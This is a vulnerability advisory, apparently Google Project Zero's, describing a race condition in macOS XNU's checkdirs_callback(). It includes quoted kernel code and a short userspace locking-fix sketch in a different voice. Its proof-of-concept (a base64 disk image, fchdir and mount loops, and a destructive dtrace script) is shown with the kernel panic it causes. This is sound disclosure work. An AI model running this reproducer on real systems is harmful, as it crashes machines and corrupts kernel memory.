XNU Missing Locking Race Condition

2019.11.06
Credit: Jann Horn
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-362

XNU: missing locking in checkdirs_callback() enables race with fchdir_common()

On macOS, when a new mount point is created, the kernel uses checkdirs() to, as a comment above the function explains: "Scan all active processes to see if any of them have a current or root directory onto which the new filesystem has just been mounted. If so, replace them with the new mount point."

In other words, XNU behaves as follows:

$ hdiutil attach ./mount_cwd.img -nomount
/dev/disk2
$ cd mnt
$ ls -l
total 0
-rw-r--r-- 1 projectzero staff 0 Aug 6 18:05 underlying
$ mount -t msdos -o nobrowse /dev/disk2 .
$ ls -l
total 0
-rwxrwxrwx 1 projectzero staff 0 Aug 6 18:04 onfat
$

(This is different from e.g. Linux, where the cwd would still point to the directory on the root filesystem that is now covered by the mountpoint, and the second "ls -l" would show the same output as the first one.)

checkdirs() uses proc_iterate() to execute checkdirs_callback() on each running process. checkdirs_callback() is implemented as follows:

======================================================
static int
checkdirs_callback(proc_t p, void * arg)
{
    struct cdirargs * cdrp = (struct cdirargs * )arg;
    vnode_t olddp = cdrp->olddp;
    vnode_t newdp = cdrp->newdp;
    struct filedesc *fdp;
    vnode_t tvp;
    vnode_t fdp_cvp;
    vnode_t fdp_rvp;
    int cdir_changed = 0;
    int rdir_changed = 0;

    /*
     * XXX Also needs to iterate each thread in the process to see if it
     * XXX is using a per-thread current working directory, and, if so,
     * XXX update that as well.
     */

    proc_fdlock(p);
    fdp = p->p_fd;
    if (fdp == (struct filedesc *)0) {
        proc_fdunlock(p);
        return(PROC_RETURNED);
    }
    fdp_cvp = fdp->fd_cdir;
    fdp_rvp = fdp->fd_rdir;
    proc_fdunlock(p);

    if (fdp_cvp == olddp) {
        vnode_ref(newdp);
        tvp = fdp->fd_cdir;
        fdp_cvp = newdp;
        cdir_changed = 1;
        vnode_rele(tvp);
    }
    if (fdp_rvp == olddp) {
        vnode_ref(newdp);
        tvp = fdp->fd_rdir;
        fdp_rvp = newdp;
        rdir_changed = 1;
        vnode_rele(tvp);
    }
    if (cdir_changed || rdir_changed) {
        proc_fdlock(p);
        fdp->fd_cdir = fdp_cvp;
        fdp->fd_rdir = fdp_rvp;
        proc_fdunlock(p);
    }
    return(PROC_RETURNED);
}
======================================================

`p->p_fd` contains the current working directory (`->fd_cdir`) and root directory (`->fd_rdir`) of the process; it is protected against modification by proc_fdlock()/proc_fdunlock(). Because checkdirs_callback() does not hold that lock across the entire operation, several races are possible; for example:

 - If `fdp->fd_cdir == olddp` is true and `fdp->fd_cdir` changes between the read `tvp = fdp->fd_cdir;` and the second `proc_fdlock(p);`, `vnode_rele(tvp);` will release a nonexistent reference, leading to reference count underflow.
 - If `fdp->fd_cdir == olddp` is true and the process calls chroot() between the first locked region and the second locked region, a dangling pointer will be written back to `fdp->fd_rdir`.

I have written a simple reproducer for the first scenario; however, since the race window is quite narrow, it uses dtrace to make the race easier to hit (so you have to turn off SIP).
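For illustration only, the races listed above go away if the comparison and the pointer swap happen inside a single locked region. The following is a minimal userspace sketch of that pattern, not kernel code and not necessarily how the issue was or will be patched in XNU. Everything named `model_*` is hypothetical: a pthread mutex stands in for proc_fdlock()/proc_fdunlock(), and an atomic counter stands in for the vnode use count.

```c
#include <assert.h>
#include <pthread.h>
#include <stdatomic.h>
#include <stddef.h>

/* Hypothetical stand-in for a vnode: only a use count is modelled. */
struct model_vnode {
    atomic_int usecount;
};

/* Hypothetical stand-in for struct filedesc together with its lock. */
struct model_fd {
    pthread_mutex_t lock;       /* plays the role of proc_fdlock() */
    struct model_vnode *cdir;   /* plays the role of fd_cdir */
    struct model_vnode *rdir;   /* plays the role of fd_rdir */
};

static void model_ref(struct model_vnode *vp)
{
    atomic_fetch_add(&vp->usecount, 1);
}

static void model_rele(struct model_vnode *vp)
{
    int old = atomic_fetch_sub(&vp->usecount, 1);
    assert(old > 0); /* firing here would be a reference count underflow */
}

/*
 * Replace cdir/rdir with newdp if they currently point at olddp.
 * Returns the number of slots that were switched (0, 1 or 2).
 */
static int model_checkdirs(struct model_fd *fdp,
                           struct model_vnode *olddp,
                           struct model_vnode *newdp)
{
    struct model_vnode *old_cdir = NULL;
    struct model_vnode *old_rdir = NULL;
    int changed = 0;

    /* Take both references up front, outside the lock. */
    model_ref(newdp);
    model_ref(newdp);

    /* Compare and swap in ONE locked region, so no other thread can
     * change cdir/rdir between the check and the write. */
    pthread_mutex_lock(&fdp->lock);
    if (fdp->cdir == olddp) {
        old_cdir = fdp->cdir;
        fdp->cdir = newdp;
        changed++;
    }
    if (fdp->rdir == olddp) {
        old_rdir = fdp->rdir;
        fdp->rdir = newdp;
        changed++;
    }
    pthread_mutex_unlock(&fdp->lock);

    /* For each slot: drop the displaced reference if a swap happened,
     * otherwise drop the reference on newdp that went unused. */
    model_rele(old_cdir ? old_cdir : newdp);
    model_rele(old_rdir ? old_rdir : newdp);
    return changed;
}
```

In this sketch the reference that gets released is always the one that was actually displaced while the lock was held, so a concurrent fchdir()-style writer taking the same lock cannot cause the wrong vnode to be released or a stale pointer to be written back.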
To prepare an empty FAT32 filesystem and the PoC: ====================================================== Projects-Mac-mini:mount_cwd projectzero$ base64 -D | gunzip > mount_cwd.img H4sIAI3cSV0CA+3TLUsEcRAH4PUQlBMPk2Dyj82yoNmgQZsv4bQIwsrt6XLn7nG75cDgR/BziEls ghiu3rewXTGa1C0GszafZwZm4NcGZrp1e9XrlnE3qaLG7EzUqGv+vRGFaDv6dhOtb40fxgeH4WBn fzfU9nbaG5v1bK0+n17fr71UCyePrae5aLJ0Nn3bfJ0sT1amH+3LrAx150UVknBeFFVy3k9DJyt7 cQhH/TQp05DlZTr8kXf7xWAwCkneWWwOhmlZ1uso9NJRqIpQDevkIsnyEMdxWGxG/Mbx3fvnpzPA P+X/AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+EtfAgGlzAAA EAA= Projects-Mac-mini:mount_cwd projectzero$ Projects-Mac-mini:mount_cwd projectzero$ cat > flipflop2.c #include <fcntl.h> #include 
<err.h>
#include <unistd.h>
#include <stdio.h>

int main(void) {
  int outer_fd = open(".", O_RDONLY);
  if (outer_fd == -1) err(1, "open outer");
  int inner_fd = open("mnt", O_RDONLY);
  if (inner_fd == -1) err(1, "open inner");

  while (1) {
    if (fchdir(inner_fd)) perror("chdir 1");
    if (fchdir(outer_fd)) perror("chdir 2");
  }
}
Projects-Mac-mini:mount_cwd projectzero$ cc -o flipflop2 flipflop2.c
Projects-Mac-mini:mount_cwd projectzero$ cat > mountloop.c
#include <stdlib.h>
#include <stdio.h>
#include <err.h>

int main(int argc, char **argv) {
  char mount_cmd[1000];
  sprintf(mount_cmd, "mount -t msdos -o nobrowse %s mnt", argv[1]);
  while (1) {
    if (system(mount_cmd) != 0)
      errx(1, "mount failed");
umount:;
    if (system("umount mnt")) {
      puts("umount failed");
      goto umount;
    }
  }
}
Projects-Mac-mini:mount_cwd projectzero$ cc -o mountloop mountloop.c
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ cat > test.dtrace
#!/usr/sbin/dtrace -w -s

__mac_mount:entry { mount_pending = 1; }
__mac_mount:return { mount_pending = 0; }
proc_iterate:entry { in_proc_iterate = 1; }
proc_iterate:return { in_proc_iterate = 0; }
vnode_rele_internal:entry {
  if (mount_pending && in_proc_iterate) {
    chill(1000*1000*10);
  }
}
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ chmod +x test.dtrace
Projects-Mac-mini:mount_cwd projectzero$
Projects-Mac-mini:mount_cwd projectzero$ mkdir mnt
Projects-Mac-mini:mount_cwd projectzero$
======================================================

In one terminal, launch the dtrace script as root:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ sudo ./test.dtrace
dtrace: script './test.dtrace' matched 10 probes
dtrace: allowing destructive actions
======================================================

In a second terminal, set up the loop device and launch the ./flipflop2 helper:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ hdiutil attach ./mount_cwd.img -nomount
/dev/disk2
Projects-Mac-mini:mount_cwd projectzero$ ./flipflop2
======================================================

In a third terminal, launch the ./mountloop helper:

======================================================
Projects-Mac-mini:mount_cwd projectzero$ ./mountloop /dev/disk2
umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
umount failed
umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
umount failed
umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
umount failed
[...]
======================================================

(Don't mind the error spew from ./flipflop2 and ./mountloop, that's normal.)

Within a few minutes, the system should panic, with an error report like this:

======================================================
*** Panic Report ***
panic(cpu 0 caller 0xffffff80055f89c5): "vnode_rele_ext: vp 0xffffff80276ee458 kusecount(4) out of balance with usecount(3). v_tag = 25, v_type = 2, v_flag = 84800."@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.270.47/bsd/vfs/vfs_subr.c:1937
Backtrace (CPU 0), Frame : Return Address
0xffffff911412b9d0 : 0xffffff80053ad6ed mach_kernel : _handle_debugger_trap + 0x47d
0xffffff911412ba20 : 0xffffff80054e9185 mach_kernel : _kdp_i386_trap + 0x155
0xffffff911412ba60 : 0xffffff80054da8ba mach_kernel : _kernel_trap + 0x50a
0xffffff911412bad0 : 0xffffff800535ab40 mach_kernel : _return_from_trap + 0xe0
0xffffff911412baf0 : 0xffffff80053ad107 mach_kernel : _panic_trap_to_debugger + 0x197
0xffffff911412bc10 : 0xffffff80053acf53 mach_kernel : _panic + 0x63
0xffffff911412bc80 : 0xffffff80055f89c5 mach_kernel : _vnode_rele_internal + 0xf5
0xffffff911412bcc0 : 0xffffff8005607f34 mach_kernel : _dounmount + 0x524
0xffffff911412bd60 : 0xffffff8005607877 mach_kernel : _unmount + 0x197
0xffffff911412bf40 : 0xffffff80059b92ad mach_kernel : _unix_syscall64 + 0x27d
0xffffff911412bfa0 : 0xffffff800535b306 mach_kernel : _hndl_unix_scall64 + 0x16

BSD process name corresponding to current thread: umount
Boot args: -zp -v keepsyms=1

Mac OS version:
18G87

Kernel version:
Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/RELEASE_X86_64
Kernel UUID: 982F17B3-0252-37FB-9869-88B3B1C77335
Kernel slide: 0x0000000005000000
Kernel text base: 0xffffff8005200000
__HIB text base: 0xffffff8005100000
System model name: Macmini7,1 (Mac-35C5E08120C7EEAF)

System uptime in nanoseconds: 390113393507
last loaded kext at 197583647618: com.apple.filesystems.msdosfs 1.10 (addr 0xffffff7f89287000, size 69632)
last unloaded kext at 61646619017: com.apple.driver.AppleIntelLpssGspi 3.0.60 (addr 0xffffff7f88208000, size 45056)
[...]
======================================================

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by: jannh@google.com


Copyright 2024, cxsecurity.com

 
